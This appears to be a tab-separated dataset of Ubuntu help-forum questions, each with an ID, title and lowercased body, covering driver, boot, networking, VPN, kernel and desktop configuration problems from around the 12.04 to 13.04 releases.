351512	can i set the gold linker as the default one in saucy ?	previously , the /usr/bin/ld symlink was pointing to ld.gold when the binutils-gold package was installed . gold now comes with the binutils package itself , and it installs the /usr/bin/ld symlink pointing to ld.bfd . is there some hard reason for that ? since i need to use gold , can i change the symlink ? is it going to break something ?
351513	xrdp with win7pro remote desktop not working	installed xrdp on ubuntu 12.04 and it 's enabled . logging in from win7pro , i get connected but no icons or taskbar show up ; only the wallpaper is visible on the win7 remote computer . neither the left or right clicks do anything over the remote desktop .
351515	sudo airmon-ng start wlan0 not working	i am new in linux . just installed ubuntu 12.04 and i installed some updates so i can use aircrack-ng . when i write mixa @ mixa-lenovo-g780 : ~ $ sudo airmon-ng start eth1 , i get : found 4 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 890 avahi-daemon 891 avahi-daemon 897 networkmanager 911 dhclient interface chipset driver mixa @ mixa-lenovo-g780 : ~ $ and on other linux ( kali linux ) , i had same problem . i had nothing under interface , chipset , and driver . how to fix it ?
351518	power-consumption , switching off graphiccard ?	i 'm pretty new to linux , nevertheless i built a server from an old computer and i 'm currently running owncloud , minecraft and a webpage on it . i would like to reduce the power consumption to a minimum . first of all : monitoring : i tried to get powertop to show me actual wattage comsumption to define who is the most demanding part there . unfortunately powertop -- calibrate does not give me that information . so i 'm guessing that the graphics card ( geforce 210 ) is using pretty much a lot of the power . powertop also says , that the 210 is `` used '' for 100 % . i 'm using the default nouveau-driver . and i 'm starting ubuntu in text-mode ( grub_terminal=console //text base grub menu ) the server is only used in ssh , no monitor , nor a keyboard attached . specifications : q6600 , slightly undervolted . asus geforce en210 seagate 7200.12 hdd 1 gigabit ethernet card . total power comsumption @ idle : 68 watt any hints that i could follow to reduce more power consumption ? any hints to have proper monitoring ? can i switch off the graphics card at all ? thanks in advance !
351522	installation of ubuntu with windows7	i am having configuration amd sempron145 prosessor , with 2gb ram and 512mb graphics . already having win7 ultimate 32bit and want to use ubuntu 32bit with windows7 as dual boot ! how to do it !
351524	unable to boot into ubuntu 13.04 on mac	today i decided to erase os x and install ubuntu - unfortunately something went wrong and now i am asking this question on live mode on ubuntu . so basically all i did was create a bootable usb stick from os x , restarted , then held down âľ = 'alt/option* , choosed the stick , installed ubuntu and erased os x . all was good , and after installion it said : `` successful installation '' and restarted the computer . i did that , and a blinking question mark appeared on the screen . my mbp could not find any bootable partition . any idea what can i do to get ubuntu up and running ? by the way , i want to point out there is no os x partition left on my drive - i did n't use any kind of program for dual boot , since i wanted to install os x on another physical drive .
351525	i ca n't add songs to lxmusic	i 'm using lxmusic to play sounds . when i try to import files using the bottom left button , the files appear in the list for one second and then they disappear . running it from the console only produces this message : ** ( lxmusic:2640 ) : warning ** : on_playback_volume_changed : could n't get volume , output plugin not loaded . i 've tried adding music using the button and by selecting the files then dragging them to the window . any help ? i 'm on ubuntu 13.04 minimal .
351528	black screen of death on 12.04lts and 13.04	i had 13.04 installed on my laptop as my main os and win 7 as my back-up . i unfortunately encountered a bsod error on my ubuntu after installing updates ( i could only run ppas on a terminal and all i could see was a black screen and a mouse cursor ) none of the answers on that thread for bsod solved my problem . so here 's my question ... i 'm currently downloading 12.04 and thinking of using that as my main os ... will there still be a good chance that i 'll get the bsod ? i 've looked around and i see that most bsod errors occur on 12.10 and 13.04 , so does this mean that 12.04 really is more `` stable '' ? is this error somewhat common place in ubuntu ? i believe that all ubuntu releases are stable , but since the error that killed my os came from an update on 13.04 , i 'm having second thoughts . i just want to hear from people who 've been using ubuntu for a while now ... i 've only used it for about 3 weeks you see ... your thoughts on this would really help , not only to me , but to all the other newbies as well .
351535	how to install a wireless connection on my netbook ?	i have an hp 1110nr netbook . it uses wireless ( wifi ) only . it does not have a cable ( wire ) connection . how can i install ubuntu and connect to my wifi router ? the wireless does not work because there does not seem to be drivers for it in ubuntu when i install it . it seems to be looking for a wired connection only . i do not know what to do .
351537	ubuntu touch black screen samsung tab 10.1 ( p4wifi ) gt-p7510 [ solved ]	i installed both the cyanogenmod image and ubuntu release preview saw the login screen applied the p4wifi.conf to get the proper resolution connected to wireless and ran # apt-get update # apt-get install openssh-server tested to see if ssh installed and was running which it did went back over to my windows and did c : \ > adb forward tcp:5555 tcp:22 fired up putty connected to localhost:5555 got the login screen : ) root @ ubuntu-phablet # then i decided to update to the latest ubuntu touch with root @ ubuntu-phablet # apt-get upgrade it downloaded 300 packages installed them all just fine so i ran root @ ubuntu-phablet # reboot at which it rebooted i saw the samsung logo then just a black screen so i tried to ssh back in after doing the adb forward it worked just fine so i dumped out a dmesg to /tmp/dmesg.txt http : //paste.ubuntu.com/6157767/ the ubuntu page for this device is at https : //wiki.ubuntu.com/touch/devices/p4wifi solved with root @ ubuntu-phablet # apt-get install indicators-client libunity-core-6.0-8 unity8 unity8-private
351538	why is my cpu being used while doing nothing ?	i have installed ubuntu gnome in bios mode on my macbook ( bios mode so that the proprietary nvidia drivers work . i need them for gaming. ) . for some reason , a lot of cpu is being used while not really doing anything . it swings between 20-30 % on both cores , usually . but when i look at the list of processes and sort by cpu usage , i do not see anything special . no processes intensively doing anything . how can i fix this ? edit : output of top command . jop @ jop-macbook : ~ $ top top - 17:08:02 up 41 min , 2 users , load average : 0,51 , 0,69 , 0,95 tasks : 202 total , 2 running , 200 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 11,9 us , 5,8 sy , 0,0 ni , 80,3 id , 0,5 wa , 0,0 hi , 1,5 si , 0,0 st kib mem : 7908316 total , 2919940 used , 4988376 free , 153248 buffers kib swap : 3906244 total , 0 used , 3906244 free , 1326544 cached pid user pr ni virt res shr s % cpu % mem time+ command 3785 root 20 0 195m 82m 26m s 22,9 1,1 2:43.77 xorg 4429 jop 20 0 1543m 150m 60m s 7,3 1,9 1:26.26 compiz 4198 jop 20 0 633m 21m 11m s 1,7 0,3 0:04.96 unity-panel-ser 7425 jop 20 0 564m 18m 12m s 1,7 0,2 0:00.84 gnome-terminal 7019 jop 20 0 806m 89m 46m s 1,0 1,2 0:10.01 chrome 7323 jop 20 0 966m 93m 23m s 1,0 1,2 0:06.85 chrome 6742 root 20 0 0 0 0 s 0,7 0,0 0:00.43 kworker/0:3 3 root 20 0 0 0 0 s 0,3 0,0 0:06.01 ksoftirqd/0 7008 root 20 0 0 0 0 s 0,3 0,0 0:00.27 kworker/1:3 7302 jop 20 0 972m 96m 28m s 0,3 1,2 0:06.32 chrome 7310 jop 20 0 382m 63m 39m s 0,3 0,8 0:00.34 chrome 7498 jop 20 0 24840 1600 1120 r 0,3 0,0 0:00.22 top 1 root 20 0 27176 2944 1412 s 0,0 0,0 0:01.58 init 2 root 20 0 0 0 0 s 0,0 0,0 0:00.00 kthreadd 5 root 0 -20 0 0 0 s 0,0 0,0 0:00.00 kworker/0:0h 6 root 20 0 0 0 0 s 0,0 0,0 0:00.00 kworker/u4:0 7 root rt 0 0 0 0 s 0,0 0,0 0:02.04 migration/0 even when xorg is n't so busy like when i copied , cpu usage is higher then what the processes use . strangely , i only have this problem with ubuntu and ubuntu gnome . on kubuntu , xubuntu and lubuntu , i do not have this problem . has it to do with gnome 's way of doing 3d stuff ?
351541	import of icloud contact data ( .vcf ) with evolution , missing adresses	i have a problem with importing my icloud contact data in evolution . the contact data i import to evolution ( .vcf ) only contain mailing addresses , which are saved as personal or business adress . however some of my contacts have a different description , e.g . `` norway address '' or `` germany address '' instead of personal or business . i am not able to see these addresses in evolution . is there any possibility to avoid this ?
351545	ubuntu installation error for 13.04 and 12.04	during the gui installation , i get an error box with a series of ? ? ? ? ? ? ? when it begins the installation . this has happened for both 13.04 and 12.04 flavors . it loads the `` try ubuntu '' but not the installation . the notebook itself recently had an error with its previous windows os where it would only boot straight to the bios and not boot anything . suggestions on what the issue is ?
351546	installed gnome 3.8 and ubuntu tweak & ubuntu software centre keep crashing	i installed ubuntu tweak ( for obvious reasons ) and then i installed gnome 3.8 , then both software centre and ubuntu tweak keep crashing . when i run the programs in terminal i get : ( ubuntu-tweak:4198 ) : gtk-error ** : gtkbox child gtktreeview minimum width : -1 < 0 for height 359 trace/breakpoint trap & ( software-center:4222 ) : gdk-error ** : the program 'software-center ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 4076 error_code 9 request_code 62 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap please help me fix this !
351547	virt-manager-0.10.0 - gtk3	every time when i try to start virt-manager-0.10.0 i get the following error : error starting virtual machine manager : requiring namespace 'gtk ' version '2.0 ' , but '3.0 ' is already loaded the exact issue you can find here ( screenshots ) : imageshack.us/photo/my-images/30/e574.png imageshack.us/photo/my-images/62/ekxi.png i also tried to start the program with the shell command sudo ./virt-manager but i got the same error . i installed it over this ppa : https : //launchpad.net/~jacob/+archive/virtualisation iâ´m using ubuntu 13.04 , how can i fix that ?
351548	recommended laptop !	hello everyone i 'm currently planning to purchase a new notebook and of-course gon na install ubuntu but i need to know the best laptops compatible with linux . i do n't care about high graphics cards ( intel hd-4000 ) will be enough for me and what 's more important the network adapters ( ethernet , wifi ) would work fine because i remember had bad time with the previous broadcom adapter . thank you very much !
351552	what are the procedure to install the drivers for the ati radeon mobility x2300 ?	i recently decided to scrap my windows partition for ubuntu 13.04 when i found out steam is available for linux . i just cant seem to play any games on it because i ca n't find how to install the right graphics driver . i have an ati radeon mobility x2300 . it is an hp compaq 6910p notebook . any info on the subject would be awesome .
351554	windows 8 overwrites boot with ubuntu 12.10	i have a sony vaio s series with windows 8 preinstalled and then i installed ubuntu 12.10 partition . the first time i was booting the grub appeared , and i was able to choose between windows 8 and ubuntu 12.10 . the problem is that when i select windows 8 the grub does n't appear anymore and it boots always on windows . i read a bout this command in a windows command prompt : bcdedit /set { bootmgr } path \efi\ubuntu\grubx64.efi seems like the command worked in the sense that you can see again the purple grub menu at boot , and it also works when you select ubuntu however , if you select to boot windows 8 from grub , you get the following two errors : error : ca n't find command 'drivemap' error : invalid efi file path .
351556	ubuntu one oauth login from python	i logged into the ubuntu one and sync ( or almost read ) files from my web page , all done with python by following these steps . 1 . created a new token in ubuntu sso ( login.ubuntu.com ) ( [ api docs ] [ 1 ] ) 2 . told ubuntu one about that new token ( [ api docs ] [ 2 ] ) 3 . used that new token to sign a request to the ubuntu one files api ( [ api docs ] [ 3 ] ) but i want silent login to ubuntu one . so that all login process should be done in python script , and no login screen should appear . please guide me how can i do this ? thanks
351562	repository not found ( 404 error )	i 'm trying to update my graphics drivers ( intel hd graphics 3000 ) using the intel linux graphics installer . first i met the problem that there was a public key missing , which i could solve . now i get the following errors : w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/raring/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/raring/main/binary-i386/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/ralf.hersel/rhersel-ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/ralf.hersel/rhersel-ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i 've opened http : //ppa.launchpad.net/amith/ubuntutools in firefox and navigated down to dists . there i 've only found the subdirectory quantal , the requested one , raring was missing . how can i fix this ? could i install the outdated 1.0.1 installer for quantal or would there be presumable problems ? ps : raring x64 pps : the answer posted at the possible duplicate is a conclusion of the missing raring directory ...
351568	problem de mise a jour 12.10 a 13.04	انا عبد القادر من الجزائر..و عندي مشكل في التحديت في توزيعة ابونتو ... .التحديت من 12.10 الى 13.04 يعني انه عند التحديت يضهر الي هدا الامرw : failed to fetch cdrom : //ubuntu 12.10 quantal quetzal - release i386 ( 20121017.2 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.10 quantal quetzal - release i386 ( 20121017.2 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead .
351570	ubuntu 12.04 high definition screen and skype	i 've installed advanced setting and tried to get the text size with my laptop 's high definition screen larger , what i have ended up with is a mix of some large text which does not properly fit onto windows and a small cursor and icons on the top panel . as far as i 'm aware it is the best set up for larger icons with a high defintion screen . however when i 'm using skype the window that shows my own webcam is so small ( postage stamp size ) that it is almost unusable . the text conversation window is also far too small for me personally but this question is specifically if anyone knows of a way of increasing the skype window that displays my own webcam ( rather than the individual i 'm talking to ) .
351571	svn , ssh : connection refused most of the time ; other computers can connect	i am running ubuntu 12.04.3 and svn as well as ssh ( to servers ) only works sometimes in a short time window after booting my computer , but most of the time i get `` connection refused '' . the problem only started some weeks ago , before it , everything worked perfectly fine . it should not be a server issue and also not a router issue , since using my notebook i can connect without problems . i have already reinstalled ubuntu and tried 12.10 and 13.04 , the problem happens also in these versions . however , after reinstalling ubuntu 12.04.3 , it seemed to work , i may re-introduced the problem by copying back my home folder from the previous installation ( if there is some config in this folder ? ) . uncommenting `` dnsmasq '' in networkmanager.conf seems to help in regard to the ssh problem , but for svn i still can get no connection . ssh -vvvvv gives openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to xxxx port 22. debug1 : connect to address xxx port 22 : connection refused ssh : connect to xxx port 22 : connection refused what other output do you need ? thank you for your help , the problem really drives me crazy . edit : now ssh works and svn not and i did not change anything , before the last boot svn worked . i tried arp-scan -i eth0 -l and got a ( dup:2 ) with two times the same ip and mac adress .
351572	start a web browser application with no window borders	how can i start a web browser with no window borders and buttons ? i am thinking at something like this : chromium-browser my-file.html -- no-borders -- no-tabs in my mind this would open chromium with no title bar , with no tabs and no buttons for close , minimize and so on . i would need also an api for javascript for closing , maximizing , resizing and dragging the window ... for example if myfile.html contains a button when i click it , somewhere in js side will be called a function that will close the browser window . is there any tool ?
351575	error trying to run ubuntu in virtualbox	i have followed directions to install ubuntu 12.04 on virtualbox . trying to start the machine gives me the following error : buffer i/o error on device zram0 .. and ubuntu does not open . i have tried re-installing ubuntu as a new virtual machine . can someone help ?
351576	mdadm -- assemble -- scan show duplicate md device md0	i am in a fresh install of ubuntu 12.04.3 file server set in raid 1 after many attempt to install grub2 i have created a separate partition for grub2 so the partitionning is on both 500g disk are .. ( gpt partition table ) 1 mb for bios-grub sda1 , sdb1 ( not included in raid1 ) 200mb for /boot sda2 , sdb2 =md0 6gb for swap sda3 , sdb3 =md1 494g for / sda4 , sdb4 =md2 at reboot i went to a live cd ..to proceed a chroot installation of grub2 so after apt-get update , apt-get install mdadm , mdadm -- assemble -- scan got this message devices uuid : -- xxxxx anf uuid : -zzzzzzzzz have same name in conf file /dev/md/0 when i cat mdmadm.conf there is 2 md0 ? ? ? with different uuid array i was able to mdadm -- assemble /dev/md1 and md2 my google on this has not showed much ! ! not sure if i can edit mdadm.conf ( ? )
351579	problem changing default search engine in firefox address bar	i have set the keyword.url field in about : config to https : //www.google.co.in/search ? q= but still when i type anything in the address bar it shows results in yahoo ! search .
351582	open terminal window and execute python script on startup	i have a python script which i would like to execute at every startup . i can run it by adding this to the startup applications : python3 /path/to/script.py that works , but it does n't open a terminal window , so i ca n't see the program 's output . how could i make it open a terminal window and execute the script in there ? note : i get the window to stay open with input ( ' ' ) at the end of the python script . thanks !
351583	pipelight firefox : silverlight not correctly installed - aborting	after installing pipelight from the installation instructions at pipelight : using silverlight in linux browsers not getting errors while installing i opened firefox to look under the plugins it said pipelighterror , check the terminal for output . after starting firefox from the terminal and opening the plugins tab again the terminal showed me this : ( firefox:6397 ) : libdbusmenu-gtk-critical ** : dbusmenu_menuitem_property_set_shortcut : assertion `gtk_accelerator_valid ( key , modifier ) ' failed [ pipelight : lin ] attached to process . [ pipelight : lin ] trying to load config file from '/home/michel/.config/pipelight ' . [ pipelight : lin ] trying to load config file from '/etc/pipelight ' . [ pipelight : lin ] trying to load config file from '/usr/share/pipelight/pipelight ' . [ pipelight : lin ] basicplugin.c:363 : checkgraphicdriver ( ) : gpu driver check script not found - treating test as failure . [ pipelight : lin ] using wine prefix directory /home/michel/.wine-pipelight/ . [ pipelight : lin ] basicplugin.c:151 : attach ( ) : silverlight not correctly installed - aborting . after checking my homefolder , i found out that there was no .wine-pipelight folder at all . does anyone know how to fix this ? thanks in advance !
351585	black screen after login : : lubuntu	i was going to switch monitors and the screen looked really weird and stretched so i changed the resolution . the next time i turned on my computer and logged in , the screen says it can not display . i switched back to the old monitor . i do not want to reinstall lubuntu , is there a way i can change the resolution back to auto without logging in ?
351587	change aphostrohe with altgr + p using xmodmap	i 'm struggling with changing one keybind with xmodmap . altgr + p outputs þ , but i would like to change it to output ' . xmodmap -pm outputs : xmodmap : up to 4 keys per modifier , ( keycodes in parentheses ) : shift shift_l ( 0x32 ) , shift_r ( 0x3e ) lock caps_lock ( 0x42 ) control control_l ( 0x25 ) , control_r ( 0x69 ) mod1 alt_l ( 0x40 ) , meta_l ( 0xcd ) mod2 num_lock ( 0x4d ) mod3 mod4 super_l ( 0x85 ) , super_r ( 0x86 ) , super_l ( 0xce ) , hyper_l ( 0xcf ) mod5 iso_level3_shift ( 0x5c ) , mode_switch ( 0xcb ) i ca n't seem to attach alt_r as one of the modifiers ( unless its there as iso_level3_shift or mode_switch ) . here is what xev shows : # - p keyrelease event , serial 41 , synthetic no , window 0x4800001 , root 0x2b8 , subw 0x0 , time 194353 , ( 300 , -235 ) , root : ( 366,280 ) , state 0x10 , keycode 33 ( keysym 0x70 , p ) , same_screen yes , xlookupstring gives 1 bytes : ( 70 ) `` p '' xfilterevent returns : false # - altgr keyrelease event , serial 41 , synthetic no , window 0x4800001 , root 0x2b8 , subw 0x0 , time 216040 , ( 249 , -329 ) , root : ( 315,186 ) , state 0x90 , keycode 108 ( keysym 0xfe03 , iso_level3_shift ) , same_screen yes , xkeysymtokeycode returns keycode : 92 xlookupstring gives 0 bytes : xfilterevent returns : false # - altgr+p keypress event , serial 41 , synthetic no , window 0x4800001 , root 0x2b8 , subw 0x0 , time 230879 , ( 218 , -187 ) , root : ( 284,328 ) , state 0x90 , keycode 33 ( keysym 0xfe , thorn ) , same_screen yes , xlookupstring gives 2 bytes : ( c3 be ) `` þ '' xmblookupstring gives 2 bytes : ( c3 be ) `` þ '' xfilterevent returns : false whenever i tried to change the binding , it either adds ' instead of p or the cobination does n't do anything . update : aphostrophe currently shows when i press altgr + j. update 2 : xmodmap -e `` keysym thorn = apostrophe '' changes p to ' even though xev outputs thorn after pressing altgr + p
351588	usb device ( thinkpad lenovo ) recognized , but not in /dev	i am running ubuntu minimal 13.04 , and want to connect my lenovo thinkpad to the laptop . after connecting : dmesg : [ 709.288194 ] usb 1-1 : new high-speed usb device number 7 using ehci-pci [ 709.541035 ] usb 1-1 : new usb device found , idvendor=17ef , idproduct=741c [ 709.541049 ] usb 1-1 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 709.541057 ] usb 1-1 : product : thinkpad [ 709.541064 ] usb 1-1 : manufacturer : lenovo [ 709.541070 ] usb 1-1 : serialnumber : mp02gc6 but fdisk -l , does not show it . how to mount the device ?
351590	ubuntu 12.04 vpn problem	i want to establish a vpn ( pptp ) connection to my school , but it always fails . this is what i get from tail -f /var/log/syslog sep 29 20:25:56 vaioz networkmanager [ 1981 ] : < info > starting vpn service 'pptp ' ... sep 29 20:25:56 vaioz networkmanager [ 1981 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 3754 sep 29 20:25:56 vaioz networkmanager [ 1981 ] : < info > vpn service 'pptp ' appeared ; activating connections sep 29 20:26:00 vaioz networkmanager [ 1981 ] : < info > vpn plugin state changed : starting ( 3 ) sep 29 20:26:00 vaioz networkmanager [ 1981 ] : < info > vpn connection 'vpn-howest ' ( connect ) reply received . sep 29 20:26:00 vaioz pppd [ 3761 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . sep 29 20:26:00 vaioz pppd [ 3761 ] : pppd 2.4.5 started by root , uid 0 sep 29 20:26:00 vaioz pppd [ 3761 ] : using interface ppp0 sep 29 20:26:00 vaioz pppd [ 3761 ] : connect : ppp0 < -- > /dev/pts/1 sep 29 20:26:00 vaioz networkmanager [ 1981 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 29 20:26:00 vaioz networkmanager [ 1981 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . sep 29 20:26:00 vaioz pptp [ 3764 ] : nm-pptp-service-3754 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated sep 29 20:26:01 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' sep 29 20:26:01 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply sep 29 20:26:01 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . sep 29 20:26:02 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' sep 29 20:26:02 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . sep 29 20:26:02 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 34132 ) . sep 29 20:26:32 vaioz pppd [ 3761 ] : lcp : timeout sending config-requests sep 29 20:26:32 vaioz pppd [ 3761 ] : connection terminated . sep 29 20:26:32 vaioz avahi-daemon [ 1952 ] : withdrawing workstation service for ppp0 . sep 29 20:26:32 vaioz networkmanager [ 1981 ] : < warn > vpn plugin failed : 1 sep 29 20:26:32 vaioz networkmanager [ 1981 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 29 20:26:32 vaioz pppd [ 3761 ] : modem hangup sep 29 20:26:32 vaioz pptp [ 3764 ] : nm-pptp-service-3754 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error sep 29 20:26:32 vaioz pptp [ 3764 ] : nm-pptp-service-3754 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log sep 29 20:26:32 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) sep 29 20:26:32 vaioz pptp [ 3772 ] : nm-pptp-service-3754 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' sep 29 20:26:32 vaioz pppd [ 3761 ] : exit . i did the configuration with the network manager and tried it manually by following this tutorial : https : //wiki.ubuntu.com/vpn but i always give me the same `` lcp : timeout sending config-requests '' problem .
351591	command completion in r and python	in bash terminal , i could configure the command completion by inserting these lines to the /etc/inputrc file : $ if bash # search history back and forward using page-up and page-down `` \e [ 5~ '' : history-search-backward `` \e [ 6~ '' : history-search-forward `` \e [ a '' : history-search-backward # arrow up `` \e [ b '' : history-search-forward # arrow down # completion set match-hidden-files off set page-completions off set completion-query-items 350 set show-all-if-ambiguous on $ endif i wonder if there is anyway to use this feature in programs such as r and python interactive environments ? on a workstation for r , somehow i have this ability , so wonder how can i configure that for my laptop as well . the r version is : r version 3.0.1 ( 2013-05-16 ) -- `` good sport '' copyright ( c ) 2013 the r foundation for statistical computing platform : x86_64-pc-linux-gnu ( 64-bit ) so , i am sure that it is possible , but does anyone know how to set it up ?
351593	bulk/batch convert mp4 and m4v files to webm via command line ?	is it possible to convert mp4 and m4v to webm via command line ? i 'd like to just in a bulk swoop convert my mp4 and m4v files to web so i can play them in firefox without any issues .
351594	wireless disabled by hardware switch on an asus x550v	i 'm using ubuntu 13.04 and i have asus x550v laptop . this is my rfkill list : 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes 3 : hci0 : bluetooth soft blocked : no hard blocked : no before you start going : hey , just turn on your hardware switch , dummy ... my hardware switch is fn + f2 and it works perfectly fine on my windows boot . but , on my ubuntu boot it does nothing ... all the other fn + f_ combos work ( turn off the touchpad , screen turn off , screen brightness , sound ) and they give some kind of visual indicator when i press it . my lshw log : *-network disabled description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 24:0a:64:28 : b4:25 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.8.0-19-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7900000-f797ffff memory : f7980000-f798ffff
351595	change default font in ubuntu 13.04	linux os is said to be super customisable . but , how do i change the default font in ubuntu ? i could not find any easy method to do this . some people suggested using dconf tool or gnome tweak or unity tweak tool . point is i want to do it manually so that i know how things work behind the screen . os : ubuntu 13.04
351596	chrome on ubuntu 13.04 : click to select url in address bar . how to achieve this ?	chrome on ubuntu 13.04 : click to select url in address bar . how to achieve this ? default behavior in windows is that it selects the complete url after one single left click . while the same is not implemented in ubuntu/linux . can anyone help ?
351598	vga card driver	i have a notebook and i installed ubuntu 12.04 lts again . my graphic card is ati mobility radeon hd 3470 and i did n't find any solution for driver installation .
351600	data not visible after accessing windows	i am currently using ubuntu 12.04 alongside windows 8 . i restarted my laptop to check windows 8 for the first time . but the content showed in the file explorer was not what i had saved in ubuntu . when i restarted again , and logged in to ubuntu , the data is not at all visible in one partition and only some of it are visible in the other partition , but the memory space is still occupied ( as seen in right-click -- > properties ) . how do i recover the data ? the data is there , how do i see it ?
351602	how do i pin the lowlatency kernels so apt does n't update with a newer generic kernel ?	i 'm on kubuntu 12.04 with lts-raring hwe stack . i 'm running kernel 3.8.0.30.18 low latency . a recent update replaced my low latency kernel with a slightly newer ( 3.8.0.31 ) generic kernel . i wish to prevent this and to use only the low latency kernels . how would i do this ? i believe this information is required : $ dpkg -s kxstudio-kernel-lowlatency package : kxstudio-kernel-lowlatency status : install ok installed priority : optional section : metapackages installed-size : 26 maintainer : falktx < falktx @ gmail.com > architecture : all source : kxstudio-kernel version : 2.4~precise1 depends : linux-lowlatency , linux-image-lowlatency , linux-headers-lowlatency description : the kxstudio kernels - low-latency this is a metapackage that provides the lowlatency kernel i also wish to know exactly how to use apt-cache policy to verify that the installation candidates ( for any kernel ) are correct . the command below would apparently not show me when a generic kernel might supersede a low latency kernel . $ apt-cache policy linux-lowlatency linux-lowlatency : installed : 3.8.0.30.18 candidate : 3.8.0.30.18 version table : *** 3.8.0.30.18 0 500 http : //ppa.launchpad.net/kxstudio-team/kernel/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status 3.2.0.54.43 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/universe amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/universe amd64 packages 3.2.0.23.20 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/universe amd64 packages
351603	issue with installing ubuntu 13.04 on a new partition	i am installing ubuntu 13.04 on a computer that has windows 7 already installed . i do not want to wipe it , so i took space from it , and made a new partition . i am doing this from a disk image that i burned this morning . all is fine up to this point . i then clicked the `` install now '' button . a dialog box popped up , saying the following : `` no root file system is defined . please select correct this from the partition menu . '' what is going on ? what am i doing wrong ? what should i do to fix this ?
351605	ext4 data recovery help	my data is on an ext4 disk that is very corrupt , here is the output from fsck.ext4 : http : //paste.debian.net/plain/47345 ( there are 664 inodes containing multiply-claimed blocks . ) why has this happened and how do i recover my data ?
351606	problems with the memory in a booted usb	i have got a usb bootable for ubuntu . i installed this operating system on the usb . it actually works very well . the problem is that when i save a file in the home folder , for example , when i restart the computer the file does not exist any more . it is also happening with other settings as well such as the time setting , the keyboard format or the fact that i have to introduce the wifi password each time . i know that i have access to the hard drive of the computer so i can create and modify files that will always be available either from the linux usb or from the windows original operating system of the computer . but i would like to have also usb memory , if you know what i mean . how could i solve this problem ?
351607	adding touchscreen driver via command line	i 've installed android x86 on my windows tablet , and all works apart from the touchscreen . i 've found out how to add support to it , but only by using the source , which i dont really know how to , and it would take out wifi , ethernet , usb , etc . i was wondering if it is possible to add the support via command line ? i think its similar to ubuntu 's commands to install . here is the link to the touchscreen patch . https : //groups.google.com/forum/m/ # ! topic/android-x86/sqorx7aaicy i dont know how to install drivers on ubuntu either , so if somebody could tell me how , i 'd appriciate trying it .
351611	how do i add a custom image to notify-send ?	in notify-send i know that -i can be used to add a stock image to the notification , but how can i add my own custom image ? i have gone into usr/share/icons/gnome/32x32 where notify-send pulls from , but it wo n't show any image at all . is it possible to include an image other than the stock images ?
